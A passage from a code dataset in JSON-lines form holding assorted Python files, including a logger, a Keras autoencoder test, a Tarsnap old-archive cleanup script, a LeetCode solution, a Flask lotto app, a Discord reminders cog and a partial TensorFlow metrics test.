#\"ascdgrm\",\n]\n\nLOG_ENSET = set()\nfor m in LOG_ENABLED_MODULES:\n LOG_ENSET.add(m)\n\n\n# -----------------------------------------------------------------------------\n# Filter : Level\n# 
-----------------------------------------------------------------------------\nLV_DISABLE, LVV, LVD, LVI, LVW, LVE = tuple(range(0, 6))\nLOGLV_MAP = {\n LVV: \"V\",\n LVD: \"D\",\n LVI: \"I\",\n LVW: \"W\",\n LVE: \"E\",\n}\n\nLOG_LEVEL = LVV\n\n# -----------------------------------------------------------------------------\n# Helper functions\n# -----------------------------------------------------------------------------\n_log_index = 0\ndef inc_and_get_log_index():\n global _log_index\n _log_index += 1\n return _log_index\n\n\nclass MyLogger(object):\n def __init__(self, module_name, level=LVV):\n self._modname = module_name\n if module_name in LOG_ENSET:\n self._lv = level\n else:\n self._lv = LV_DISABLE\n\n def _pr(self, lv, msg, *args, **kwargs):\n if (lv < LOG_LEVEL\n or self._lv < LOG_LEVEL):\n return\n\n funcname = sys._getframe(2).f_code.co_name\n newmsg = '<%(idx)3d>[%(lv)s]%(mod)s:%(func)s:%(msg)s' % {\n 'idx': inc_and_get_log_index(),\n 'lv': LOGLV_MAP[lv],\n 'mod': self._modname,\n 'func': funcname,\n 'msg': msg\n }\n print(newmsg, *args, **kwargs)\n\n def v(self, msg, *args, **kwargs):\n self._pr(LVV, msg, *args, **kwargs)\n\n def d(self, msg, *args, **kwargs):\n self._pr(LVD, msg, *args, **kwargs)\n\n def i(self, msg, *args, **kwargs):\n self._pr(LVI, msg, *args, **kwargs)\n\n def w(self, msg, *args, **kwargs):\n self._pr(LVW, msg, *args, **kwargs)\n\n def e(self, msg, *args, **kwargs):\n self._pr(LVE, msg, *args, **kwargs)\n\n\ndef build_module_logger(module_name):\n m = sys.modules[module_name]\n setattr(m, \"lgr\", MyLogger(module_name))\n","sub_path":"debug/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"152595206","text":"# Test the effect of different L in regularizer\n\nimport tensorflow as tf\ntf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)\n\nimport keras\nfrom keras.layers import Input, Dense\nfrom keras.models import Model\n\nimport numpy as np\nimport pickle\nimport datetime\nimport time\nimport sys\n\nfrom sklearn import preprocessing\n\nprint('sae_l_test starting: {}'.format(datetime.datetime.now()), file=sys.stderr)\nstart = time.time()\n\nearly_stopping_monitor = keras.callbacks.EarlyStopping(monitor='loss', patience=20, verbose=1)\n\npklfile = '../../data/all_bands.pkl'\nwith open(pklfile, 'rb') as fi:\n data = pickle.load(fi)\n\ndata = preprocessing.MinMaxScaler().fit_transform(np.abs(data))\n\n\ndef sparseAutoencoder(feat_mat, l=1e-5, hidden_size=800, batch_size=128, epochs=2000):\n \n input_size = feat_mat.shape[1]\n\n\n x = Input(shape=(input_size,))\n h = Dense(hidden_size, activation='relu', activity_regularizer=keras.regularizers.l1(l))(x)\n r = Dense(input_size, activation='sigmoid')(h)\n\n ae = Model(inputs=x, outputs=r)\n ae.compile(optimizer='adam', loss='mse',metrics=['accuracy'])\n\n history = ae.fit(feat_mat, feat_mat, batch_size=batch_size,epochs=epochs, callbacks = [early_stopping_monitor])\n encoder = Model(x,h)\n return ae, encoder, history\n\n\nl_list = [1e-2, 1e-3, 1e-4, 1e-5, 1e-6, 1e-7]\nhis = []\n\nfor val in l_list:\n sae, sae_encoder, sae_his = sparseAutoencoder(data, l=val, epochs=1000)\n \n model_path = '../../models/model_sae_{}.mdl'.format(val)\n encoder_path = '../../models/encoder_sae_{}.mdl'.format(val)\n \n sae.save(model_path)\n sae_encoder.save(encoder_path)\n\n his.append(sae_his)\n\npklfile = '../../data/history_sae.pkl'\nwith open(pklfile, 'wb') as fo:\n pickle.dump(his, 
fo)\n\n\n\nelapsed_time = time.strftime(\"%H:%M:%S\", time.gmtime(time.time() - start))\nprint('sae_l_test finished: {}'.format(elapsed_time), file=sys.stderr)","sub_path":"signatures/AE/tests/sae_l_test.py","file_name":"sae_l_test.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"509072460","text":"import subprocess, sys\nfrom datetime import datetime, timedelta\nfrom dateutil import parser as date_parser\nfrom tarsnap_config import tarsnap_config\n\ndelete_message_format = \"Deleting archive: {archive} ({delete_number}/{total_deletes})\"\nerror_message_format = \"Failed to delete archive {archive} with error: {error}\"\nsuccess_message_format = \"Deleted archive: {archive}\"\n\nreference_date = datetime.now()\ntime_interval = 0\ntime_unit = ''\n\ntry:\n time_interval = int(sys.argv[1])\n time_unit = sys.argv[2].lower()\nexcept ValueError:\n pass\n\nif time_interval <= 0 or time_unit not in ['seconds', 'minutes', 'hours', 'days', 'weeks']:\n print(\"Please provide the minimum age of the archives you want to delete.\\n\"\n \"Usage: python tarsnap_delete_old.py <time_interval> <time_unit>\\n\"\n \"Ex: python tarsnap_delete_old.py 7 days\")\n sys.exit()\n\ndelta = None\nif time_unit == 'seconds':\n delta = timedelta(seconds=time_interval)\nelif time_unit == 'minutes':\n delta = timedelta(minutes=time_interval)\nelif time_unit == 'hours':\n delta = timedelta(hours=time_interval)\nelif time_unit == 'days':\n delta = timedelta(days=time_interval)\nelif time_unit == 'weeks':\n delta = timedelta(weeks=time_interval)\nelse:\n pass\n\nif delta is None:\n print(\"Invalid time delta.\")\n sys.exit()\n\nprint(\"Getting Tarsnap archives...\")\n\nlist_request_args = [\"tarsnap\", \"--list-archives\", \"--keyfile\", tarsnap_config[\"keyfile\"]]\nlist_request = subprocess.Popen(list_request_args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\nlist_response, list_error = list_request.communicate()\n\nif list_error is not None and len(list_error) > 0:\n list_error_message_format = \"Failed to list Tarsnap archives with error: {error}\"\n print(list_error_message_format.format(error=list_error))\n sys.exit()\n\narchives_list = sorted([item.strip() for item in list_response.splitlines()])\narchives_to_delete = []\n\nif len(archives_list) > 0:\n for archive in archives_list:\n components = archive.rsplit('-', 3)\n archive_name = components[0]\n archive_date = date_parser.parse('-'.join(components[1:]))\n if reference_date - archive_date > delta:\n archives_to_delete.append(archive)\nelse:\n print(\"No archives found.\")\n sys.exit()\n\ntotal_deletes = len(archives_to_delete)\ndelete_number = 1\n\nif total_deletes > 0:\n for archive in archives_to_delete:\n print(delete_message_format.format(\n archive=archive,\n delete_number=delete_number,\n total_deletes=total_deletes))\n\n delete_request_args = [\n \"tarsnap\", \"-d\", \n \"--keyfile\", tarsnap_config[\"keyfile\"], \n \"--cachedir\", tarsnap_config[\"cachedir\"],\n \"-f\", archive]\n\n delete_request = subprocess.Popen(delete_request_args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n delete_response, delete_error = delete_request.communicate()\n\n if delete_error is not None and len(delete_error) > 0:\n print(error_message_format.format(archive=archive, error=delete_error))\n else:\n print(success_message_format.format(archive=archive))\n\n delete_number = delete_number + 1\nelse:\n print(\"No archives to delete.\")\n sys.exit()\n\nprint(\"Deleted old 
archives.\")","sub_path":"tarsnap_delete_old.py","file_name":"tarsnap_delete_old.py","file_ext":"py","file_size_in_byte":3275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"257915743","text":"# https://leetcode.com/problems/median-of-two-sorted-arrays/description/\n\n\nclass Solution:\n def findMedianSortedArrays(self, nums1, nums2):\n \"\"\"\n :type nums1: List[int]\n :type nums2: List[int]\n :rtype: float\n \"\"\"\n\n l1, l2 = len(nums1), len(nums2)\n if l1 > l2:\n nums1, nums2, l1, l2 = nums2, nums1, l2, l1\n\n # Initiate for left part of nums1 (i elements) and left part of nums2 (j elements)\n # The target for i and j is that whole left part is less than whole right part\n # (nums1) ...i... | ...l1 - i... (i elements: nums1[0] ... nums1[i-1])\n # (nums2) ...j... | ...l2 - j... (j elements: nums2[0] ... nums2[j-1])\n # | \n\n i_min, i_max = 0, l1\n while i_min <= i_max:\n i = (i_min + i_max) // 2\n j = (l1 + l2 + 1) // 2 - i # assume that left part have equal or more elements than right part\n # j is non-negative then l1 must NOT be greater than l2\n if i >= 1 and nums1[i-1] > nums2[j]: # i >= 1 -> j < l2, proved by math based on l1 <= l2\n i_max = i - 1\n elif i < l1 and nums2[j-1] > nums1[i]: # i < l1 -> j > 0, proved by math based on l1 <= l2\n i_min = i + 1\n else:\n # Appropriate i, j found\n if i == 0:\n max_left = nums2[j-1]\n elif j == 0:\n max_left = nums1[i-1]\n else:\n max_left = max(nums1[i-1], nums2[j-1])\n\n if (l1 + l2) % 2 == 1:\n return max_left\n\n if i == l1:\n min_right = nums2[j]\n elif j == l2:\n min_right = nums1[i]\n else:\n min_right = min(nums1[i], nums2[j])\n\n return (max_left + min_right) / 2\n","sub_path":"_PYTHON_/_problems_/_LC_/algorithms/median_of_two_sorted_arrays.py","file_name":"median_of_two_sorted_arrays.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"410655583","text":"# PyGlassBasicDialogManager.py\n# (C)2012-2013\n# Scott Ernst\n\nimport os\n\nfrom PySide import QtCore\nfrom PySide import QtGui\n\nfrom pyaid.file.FileUtils import FileUtils\n\n#___________________________________________________________________________________________________ PyGlassBasicDialogManager\nclass PyGlassBasicDialogManager(QtCore.QObject):\n\n#===================================================================================================\n# C L A S S\n\n#___________________________________________________________________________________________________ openAbout\n @classmethod\n def openAbout(cls, parent, title, text):\n return QtGui.QMessageBox.about(parent=parent, title=title, text=text)\n\n#___________________________________________________________________________________________________ openYesNo\n @classmethod\n def openYesNo(cls, parent, header, message =None, defaultToYes =True):\n dlg = QtGui.QMessageBox(parent=parent)\n dlg.setText(header)\n if message:\n dlg.setInformativeText(message)\n dlg.setStandardButtons(QtGui.QMessageBox.Yes | QtGui.QMessageBox.No)\n dlg.setDefaultButton(QtGui.QMessageBox.Yes if defaultToYes else QtGui.QMessageBox.No)\n result = dlg.exec_()\n return result == QtGui.QMessageBox.Yes\n\n#___________________________________________________________________________________________________ openOk\n @classmethod\n def openOk(cls, parent, header, message =None):\n dlg = QtGui.QMessageBox(parent=parent)\n dlg.setText(header)\n if message:\n dlg.setInformativeText(message)\n 
dlg.setStandardButtons(QtGui.QMessageBox.Ok)\n dlg.setDefaultButton(QtGui.QMessageBox.Ok)\n result = dlg.exec_()\n return True\n\n#___________________________________________________________________________________________________ openTextQuery\n @classmethod\n def openTextQuery(cls, parent, header, message =None, defaultText =None):\n \"\"\" Opens a text query dialog. If the dialog was canceled the method returns None,\n otherwise it returns the string set by the user. \"\"\"\n\n if defaultText is None:\n defaultText = u''\n result = QtGui.QInputDialog.getText(parent, header, message, text=defaultText)\n if not result[-1]:\n return None\n return result[0]\n\n#___________________________________________________________________________________________________ browseForDirectory\n @classmethod\n def browseForDirectory(cls, parent, caption =None, defaultPath =None):\n out = QtGui.QFileDialog.getExistingDirectory(\n parent,\n caption=caption if caption else u'Select a Directory',\n dir=defaultPath if defaultPath else os.path.expanduser('~'))\n\n if not out:\n return out\n return FileUtils.cleanupPath(out, isDir=True)\n\n#___________________________________________________________________________________________________ browseForFileOpen\n @classmethod\n def browseForFileOpen(cls, parent, caption =None, defaultPath =None):\n out = QtGui.QFileDialog.getOpenFileName(\n parent,\n caption=caption if caption else u'Select a File',\n dir=defaultPath if defaultPath else os.path.expanduser('~'))\n\n if not out or not out[0]:\n return out\n return FileUtils.cleanupPath(out[0], isFile=True)\n","sub_path":"src/pyglass/dialogs/PyGlassBasicDialogManager.py","file_name":"PyGlassBasicDialogManager.py","file_ext":"py","file_size_in_byte":3505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"96188312","text":"# ===== import: python function\n\n# ===== import: palantir functions\nfrom transforms.api import transform, incremental, Input, Output, configure\n\n# ===== import: our functions\nfrom python.pnl.schema.schema_dl800_new_amended_cancelled_deals import typed_output_schema\nfrom python.bp_flush_control import DL800_PROFILE\nfrom python.util.read_file_data import read_raw_write_typed\nfrom python.util.schema_utils import compute_typed, reorder_columns, is_multiline\n\n# ===== import: logging\nimport logging\nlogger = logging.getLogger(__name__)\n\n\ndef this_transform(df, typed_output_schema):\n df = compute_typed(df, typed_output_schema)\n df = reorder_columns(df, typed_output_schema)\n return df\n\n\n@configure(profile=DL800_PROFILE)\n@incremental()\n@transform(\n transform_output=Output(\"/BP/IST-IG-DD/data/technical/pnl/typed/endur/dl800_new_amended_cancelled_deals\"),\n transform_input=Input(\n \"/BP/IST-IG-SS-Systems/data/raw/endur/dl800-new_amended_cancelled_deals/dl800-new_amended_cancelled_deals\"),\n error_output=Output(\"/BP/IST-IG-DD/data/technical/pnl/typed/endur/errors/dl800_new_amended_cancelled_deals_errors\"),\n log_output=Output(\"/BP/IST-IG-DD/data/technical/pnl/typed/endur/log/dl800_new_amended_cancelled_deals_log\"),\n)\ndef my_compute_function(transform_input, transform_output, error_output, log_output):\n '''\n Version: V0 R1\n This function:\n 1. renames columns\n 2. 
casts the columns to the correct types\n\n Args:\n transform_input (TransformInput)\n transform_output (TransformOutput)\n '''\n read_raw_write_typed(\n transform_input,\n transform_output,\n typed_output_schema,\n is_multiline(transform_input),\n this_transform,\n logger,\n error_output,\n log_output,\n )\n","sub_path":"latest_integration/transforms-python/src/python/pnl/typed/endur/dl800_new_amended_cancelled_deals.py","file_name":"dl800_new_amended_cancelled_deals.py","file_ext":"py","file_size_in_byte":1797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"612102160","text":"#/lotto 랜덤 넘버를 추천해주고, 최신 로또와 비교하여 등수를 알려주는 기능\nfrom flask import Flask, render_template\nimport requests\nimport random\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\n\napp = Flask(__name__)\n\n\nnumbers = range(1,46)\nlotto = random.sample(numbers,6)\n\nurl = 'https://www.dhlottery.co.kr/common.do?method=getLottoNumber&drwNo=866'\nres = requests.get(url)\ndic_lotto = res.json()\nwinner = []\nfor i in range(1,7):\n winner.append(dic_lotto[\"drwtNo\"+str(i)])\n winner = sorted(winner)\n\n@app.route(\"/\")\ndef home():\n return render_template('home.html')\n\n#로또 랜덤 넘버를 추천해주기\n@app.route(\"/lotto\")\ndef lotto2():\n \n return render_template('lotto.html',lottonum=str(sorted(lotto)))\n\n\n# 최신 로또 번호를 가져오기\n\n@app.route(\"/thiswinner\")\ndef thiswinner():\n \n return render_template('winner.html',winnernum=winner)\n\n#등수 알려주기\n@app.route(\"/checkwin\")\ndef checkwin():\n count = len(set(winner) & set(lotto))\n if count == 6 : \n result = 1\n elif count == 5:\n result = 3\n elif count == 4:\n result = 4\n elif count == 3:\n result = 5\n else:\n result = 0\n return render_template('checkwin.html',checkwin=result)\n\n\nif __name__ == \"__main__\" :\n app.run(debug=True)","sub_path":"day03/dynamic/lotto_real.py","file_name":"lotto_real.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"441424156","text":"import asyncio\nimport datetime\nimport logging\nimport random\nimport textwrap\n\nfrom aiohttp import ClientResponseError\nfrom dateutil.relativedelta import relativedelta\nfrom discord import Colour, Embed\nfrom discord.ext.commands import Bot, Context, group\n\nfrom bot.constants import (\n Channels, Icons, Keys, NEGATIVE_REPLIES,\n POSITIVE_REPLIES, Roles, URLs\n)\nfrom bot.pagination import LinePaginator\nfrom bot.utils.scheduling import create_task\nfrom bot.utils.time import humanize_delta, parse_rfc1123, wait_until\n\nlog = logging.getLogger(__name__)\n\nSTAFF_ROLES = (Roles.owner, Roles.admin, Roles.moderator, Roles.helpers)\nWHITELISTED_CHANNELS = (Channels.bot,)\nMAXIMUM_REMINDERS = 5\n\n\n# The scheduling parts of this cog are pretty much directly copied\n# from the moderation cog. 
I'll be working on making it more\n# webscale:tm: as soon as possible, because this is a mess :D\nclass Reminders:\n\n def __init__(self, bot: Bot):\n self.bot = bot\n\n self.headers = {\"X-API-Key\": Keys.site_api}\n self.reminder_tasks = {}\n\n async def on_ready(self):\n # Get all the current reminders for re-scheduling\n response = await self.bot.http_session.get(\n url=URLs.site_reminders_api,\n headers=self.headers\n )\n\n response_data = await response.json()\n\n # Find the current time, timezone-aware.\n now = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc)\n loop = asyncio.get_event_loop()\n\n for reminder in response_data[\"reminders\"]:\n remind_at = parse_rfc1123(reminder[\"remind_at\"])\n\n # If the reminder is already overdue ...\n if remind_at < now:\n late = relativedelta(now, remind_at)\n await self.send_reminder(reminder, late)\n\n else:\n self.schedule_reminder(loop, reminder)\n\n @staticmethod\n async def _send_confirmation(ctx: Context, response: dict, on_success: str):\n \"\"\"\n Send an embed confirming whether or not a change was made successfully.\n\n :return: A Boolean value indicating whether it failed (True) or passed (False)\n \"\"\"\n\n embed = Embed()\n\n if not response.get(\"success\"):\n embed.colour = Colour.red()\n embed.title = random.choice(NEGATIVE_REPLIES)\n embed.description = response.get(\"error_message\", \"An unexpected error occurred.\")\n\n log.warn(f\"Unable to create/edit/delete a reminder. Response: {response}\")\n failed = True\n\n else:\n embed.colour = Colour.green()\n embed.title = random.choice(POSITIVE_REPLIES)\n embed.description = on_success\n\n failed = False\n\n await ctx.send(embed=embed)\n return failed\n\n def schedule_reminder(self, loop: asyncio.AbstractEventLoop, reminder):\n \"\"\"\n Schedule a reminder from the bot at the requested time.\n\n :param loop: the asyncio event loop\n :param reminder: the data of the reminder.\n \"\"\"\n\n # Avoid duplicate schedules, just in case.\n reminder_id = reminder[\"id\"]\n if reminder_id in self.reminder_tasks:\n return\n\n # Make a scheduled task and add it to the list\n task: asyncio.Task = create_task(loop, self._scheduled_reminder(reminder))\n self.reminder_tasks[reminder_id] = task\n\n async def _scheduled_reminder(self, reminder):\n \"\"\"\n A coroutine which sends the reminder once the time is reached.\n\n :param reminder: the data of the reminder.\n :return:\n \"\"\"\n\n reminder_id = reminder[\"id\"]\n reminder_datetime = parse_rfc1123(reminder[\"remind_at\"])\n\n # Send the reminder message once the desired duration has passed\n await wait_until(reminder_datetime)\n await self.send_reminder(reminder)\n\n log.debug(f\"Deleting reminder {reminder_id} (the user has been reminded).\")\n await self._delete_reminder(reminder)\n\n # Now we can begone with it from our schedule list.\n self.cancel_reminder(reminder_id)\n\n def cancel_reminder(self, reminder_id: str):\n \"\"\"\n Un-schedules a task to send a reminder.\n\n :param reminder_id: the ID of the reminder in question\n \"\"\"\n\n task = self.reminder_tasks.get(reminder_id)\n\n if task is None:\n log.warning(f\"Failed to unschedule {reminder_id}: no task found.\")\n return\n\n task.cancel()\n log.debug(f\"Unscheduled {reminder_id}.\")\n del self.reminder_tasks[reminder_id]\n\n async def _delete_reminder(self, reminder_id: str):\n \"\"\"\n Delete a reminder from the database, given its ID.\n\n :param reminder_id: The ID of the reminder.\n \"\"\"\n\n # The API requires a list, so let's give it one :)\n json_data = {\n \"reminders\": [\n reminder_id\n ]\n }\n\n await self.bot.http_session.delete(\n url=URLs.site_reminders_api,\n headers=self.headers,\n json=json_data\n )\n\n # Now we can remove it from the schedule list\n self.cancel_reminder(reminder_id)\n\n async def _reschedule_reminder(self, reminder):\n \"\"\"\n Reschedule a reminder object.\n\n :param reminder: The reminder to be rescheduled.\n \"\"\"\n\n loop = asyncio.get_event_loop()\n\n self.cancel_reminder(reminder[\"id\"])\n self.schedule_reminder(loop, reminder)\n\n async def send_reminder(self, reminder, late: relativedelta = None):\n \"\"\"\n Send the reminder.\n\n :param reminder: The data about the reminder.\n :param late: How late the reminder is (if at all)\n \"\"\"\n\n channel = self.bot.get_channel(int(reminder[\"channel_id\"]))\n user = self.bot.get_user(int(reminder[\"user_id\"]))\n\n embed = Embed()\n embed.colour = Colour.blurple()\n embed.set_author(\n icon_url=Icons.remind_blurple,\n name=\"It has arrived!\"\n )\n\n embed.description = f\"Here's your reminder: `{reminder['content']}`\"\n\n if late:\n embed.colour = Colour.red()\n embed.set_author(\n icon_url=Icons.remind_red,\n name=f\"Sorry it arrived {humanize_delta(late, max_units=2)} late!\"\n )\n\n await channel.send(\n content=user.mention,\n embed=embed\n )\n await self._delete_reminder(reminder[\"id\"])\n\n @group(name=\"remind\", aliases=(\"reminder\", \"reminders\"), invoke_without_command=True)\n async def remind_group(self, ctx: Context, duration: str, *, content: str):\n \"\"\"\n Commands for managing your reminders.\n \"\"\"\n\n await ctx.invoke(self.new_reminder, duration=duration, content=content)\n\n @remind_group.command(name=\"new\", aliases=(\"add\", \"create\"))\n async def new_reminder(self, ctx: Context, duration: str, *, content: str):\n \"\"\"\n Set yourself a simple reminder.\n \"\"\"\n\n embed = Embed()\n\n # Make sure the reminder should actually be made.\n if ctx.author.top_role.id not in STAFF_ROLES:\n\n # If they don't have permission to set a reminder in this channel\n if ctx.channel.id not in WHITELISTED_CHANNELS:\n embed.colour = Colour.red()\n embed.title = random.choice(NEGATIVE_REPLIES)\n embed.description = \"Sorry, you can't do that here!\"\n\n return await ctx.send(embed=embed)\n\n # Get their current active reminders\n response = await self.bot.http_session.get(\n url=URLs.site_reminders_user_api.format(user_id=ctx.author.id),\n headers=self.headers\n )\n\n active_reminders = await response.json()\n\n # Let's limit this, so we don't get 10 000\n # reminders from kip or something like that :P\n if len(active_reminders) > MAXIMUM_REMINDERS:\n embed.colour = Colour.red()\n embed.title = random.choice(NEGATIVE_REPLIES)\n embed.description = \"You have too many active reminders!\"\n\n return await ctx.send(embed=embed)\n\n # Now we can attempt to actually set the reminder.\n try:\n response = await self.bot.http_session.post(\n url=URLs.site_reminders_api,\n headers=self.headers,\n json={\n \"user_id\": str(ctx.author.id),\n \"duration\": duration,\n \"content\": content,\n \"channel_id\": str(ctx.channel.id)\n }\n )\n\n response_data = await response.json()\n\n # AFAIK only happens if the user enters, like, a quintillion weeks\n except ClientResponseError:\n embed.colour = Colour.red()\n embed.title = random.choice(NEGATIVE_REPLIES)\n embed.description = (\n \"An error occurred while adding your reminder to the database. \"\n \"Did you enter a reasonable duration?\"\n )\n\n log.warn(f\"User {ctx.author} attempted to create a reminder for {duration}, but failed.\")\n\n return await ctx.send(embed=embed)\n\n # Confirm to the user whether or not it worked.\n failed = await self._send_confirmation(\n ctx, response_data,\n on_success=\"Your reminder has been created successfully!\"\n )\n\n # If it worked, schedule the reminder.\n if not failed:\n loop = asyncio.get_event_loop()\n self.schedule_reminder(loop=loop, reminder=response_data[\"reminder\"])\n\n @remind_group.command(name=\"list\")\n async def list_reminders(self, ctx: Context):\n \"\"\"\n View a paginated embed of all reminders for your user.\n \"\"\"\n\n # Get all the user's reminders from the database.\n response = await self.bot.http_session.get(\n url=URLs.site_reminders_user_api,\n params={\"user_id\": str(ctx.author.id)},\n headers=self.headers\n )\n\n data = await response.json()\n now = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc)\n\n # Make a list of tuples so it can be sorted by time.\n reminders = [\n (rem[\"content\"], rem[\"remind_at\"], rem[\"friendly_id\"]) for rem in data[\"reminders\"]\n ]\n\n reminders.sort(key=lambda rem: rem[1])\n\n lines = []\n\n for index, (content, remind_at, friendly_id) in enumerate(reminders):\n # Parse and humanize the time, make it pretty :D\n remind_datetime = parse_rfc1123(remind_at)\n time = humanize_delta(relativedelta(remind_datetime, now))\n\n text = textwrap.dedent(f\"\"\"\n **Reminder #{index}:** *expires in {time}* (ID: {friendly_id})\n {content}\n \"\"\").strip()\n\n lines.append(text)\n\n embed = Embed()\n embed.colour = Colour.blurple()\n embed.title = f\"Reminders for {ctx.author}\"\n\n # Remind the user that they have no reminders :^)\n if not lines:\n embed.description = \"No active reminders could be found.\"\n return await ctx.send(embed=embed)\n\n # Construct the embed and paginate it.\n embed.colour = Colour.blurple()\n\n await LinePaginator.paginate(\n lines,\n ctx, embed,\n max_lines=3,\n empty=True\n )\n\n @remind_group.group(name=\"edit\", aliases=(\"change\", \"modify\"), invoke_without_command=True)\n async def edit_reminder_group(self, ctx: Context):\n \"\"\"\n Commands for modifying your current reminders.\n \"\"\"\n\n await ctx.invoke(self.bot.get_command(\"help\"), \"reminders\", \"edit\")\n\n @edit_reminder_group.command(name=\"duration\", aliases=(\"time\",))\n async def edit_reminder_duration(self, ctx: Context, friendly_id: str, duration: str):\n \"\"\"\n Edit one of your reminders' duration.\n \"\"\"\n\n # Send the request to update the reminder in the database\n response = await self.bot.http_session.patch(\n url=URLs.site_reminders_user_api,\n headers=self.headers,\n json={\n \"user_id\": str(ctx.author.id),\n \"friendly_id\": friendly_id,\n \"duration\": duration\n }\n )\n\n # Send a confirmation message to the channel\n response_data = await response.json()\n failed = await self._send_confirmation(\n ctx, response_data,\n on_success=\"That reminder has been edited successfully!\"\n )\n\n if not failed:\n await self._reschedule_reminder(response_data[\"reminder\"])\n\n @edit_reminder_group.command(name=\"content\", aliases=(\"reason\",))\n async def edit_reminder_content(self, ctx: Context, friendly_id: str, *, content: str):\n \"\"\"\n Edit one of your reminders' content.\n \"\"\"\n\n # Send the request to update the reminder in the database\n response = await self.bot.http_session.patch(\n url=URLs.site_reminders_user_api,\n headers=self.headers,\n json={\n \"user_id\": str(ctx.author.id),\n \"friendly_id\": friendly_id,\n \"content\": content\n }\n )\n\n # Send a confirmation message to the channel\n response_data = await response.json()\n failed = await self._send_confirmation(\n ctx, response_data,\n on_success=\"That reminder has been edited successfully!\"\n )\n\n if not failed:\n await self._reschedule_reminder(response_data[\"reminder\"])\n\n @remind_group.command(\"delete\", aliases=(\"remove\",))\n async def delete_reminder(self, ctx: Context, friendly_id: str):\n \"\"\"\n Delete one of your active reminders.\n \"\"\"\n\n # Send the request to delete the reminder from the database\n response = await self.bot.http_session.delete(\n url=URLs.site_reminders_user_api,\n headers=self.headers,\n json={\n \"user_id\": str(ctx.author.id),\n \"friendly_id\": friendly_id\n }\n )\n\n response_data = await response.json()\n failed = await self._send_confirmation(\n ctx, response_data,\n on_success=\"That reminder has been deleted successfully!\"\n )\n\n if not failed:\n self.cancel_reminder(response_data[\"reminder_id\"])\n\n\ndef setup(bot: Bot):\n bot.add_cog(Reminders(bot))\n log.info(\"Cog loaded: Reminders\")\n","sub_path":"bot/cogs/reminders.py","file_name":"reminders.py","file_ext":"py","file_size_in_byte":14633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"}
+{"seq_id":"558428952","text":"# 41. A Confederação Nacional de Natação precisa de um programa que leia o ano\r\n# de nascimento de um atleta e mostre sua categoria, de acordo com a idade:\r\n# > Até 9 anos: MIRIM\r\n# > Até 14 anos: INFANTIL\r\n# > Até 19 anos: JÚNIOR\r\n# > Até 25 anos: SÊNIOR\r\n# > Acima: MASTER\r\n\r\nfrom datetime import date\r\n\r\natual = date.today().year\r\nnascimento = int(input('Ano de nascimento: '))\r\nidade = atual - nascimento\r\nprint(f'O atleta tem {idade} anos.')\r\nif idade <= 9:\r\n print('Classificação: MIRIM')\r\nelif idade <= 14:\r\n # No 1º if já é menor/igual a 9. Se não for, com certeza será maior, então\r\n # seria redundância informar elif idade > 9 and <= 14\r\n print('Classificação: INFANTIL')\r\nelif idade <= 19:\r\n print('Classificação: JÚNIOR')\r\nelif idade <= 25:\r\n print('Classificação: SÊNIOR')\r\nelse:\r\n print('Classificação: MASTER')\r\n","sub_path":"Mundo 02: Estruturas de Controle/14. Exercícios: Condições II (Aninhadas)/41. Classificando atletas.py","file_name":"41. Classificando atletas.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"}
+{"seq_id":"41828407","text":"#https://www.hackerrank.com/challenges/ctci-ransom-note\nfrom collections import Counter\ndef ransom_note(magazine, rasom):\n return (Counter(rasom) - Counter(magazine)) == {}\n\n\nm, n = map(int, input().strip().split(' '))\nmagazine = input().strip().split(' ')\nransom = input().strip().split(' ')\nanswer = ransom_note(magazine, ransom)\nif(answer):\n print(\"Yes\")\nelse:\n print(\"No\")\n","sub_path":"cracking the code interview/ransom-note.py","file_name":"ransom-note.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"}
+{"seq_id":"256358642","text":"\"\"\"Tests for t2t_transformer.tensor2tensor.utils.metrics.\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\n\nimport tensorflow as tf\nfrom utils import metrics\n\n\nclass MetricsTest(tf.test.TestCase):\n\n def testAccuracyMetric(self):\n predictions = np.random.randint(1, 5, size=(12, 12, 12, 1))\n targets = np.random.randint(1, 5, size=(12, 12, 12, 1))\n expected = np.mean((predictions == targets).astype(float))\n with self.test_session() as session:\n scores, _ = metrics.padded_accuracy(\n tf.one_hot(predictions, depth=5, dtype=tf.float32),\n tf.constant(targets, dtype=tf.int32))\n a = tf.reduce_mean(scores)\n session.run(tf.global_variables_initializer())\n actual = session.run(a)\n self.assertAlmostEqual(actual, expected)\n\n def testAccuracyTopKMetric(self):\n predictions = np.random.randint(1, 5, size=(12, 12, 12, 1))\n targets = np.random.randint(1, 5, size=(12, 12, 12, 1))\n expected = np.mean((predictions == targets).astype(float))\n with self.test_session() as session:\n predicted = tf.one_hot(predictions, depth=5, dtype=tf.float32)\n scores1, _ = metrics.padded_accuracy_topk(\n predicted, tf.constant(targets, dtype=tf.int32), k=1)\n scores2, _ = metrics.padded_accuracy_topk(\n predicted, tf.constant(targets, dtype=tf.int32), k=7)\n a1 = tf.reduce_mean(scores1)\n a2 = tf.reduce_mean(scores2)\n session.run(tf.global_variables_initializer())\n actual1, actual2 = 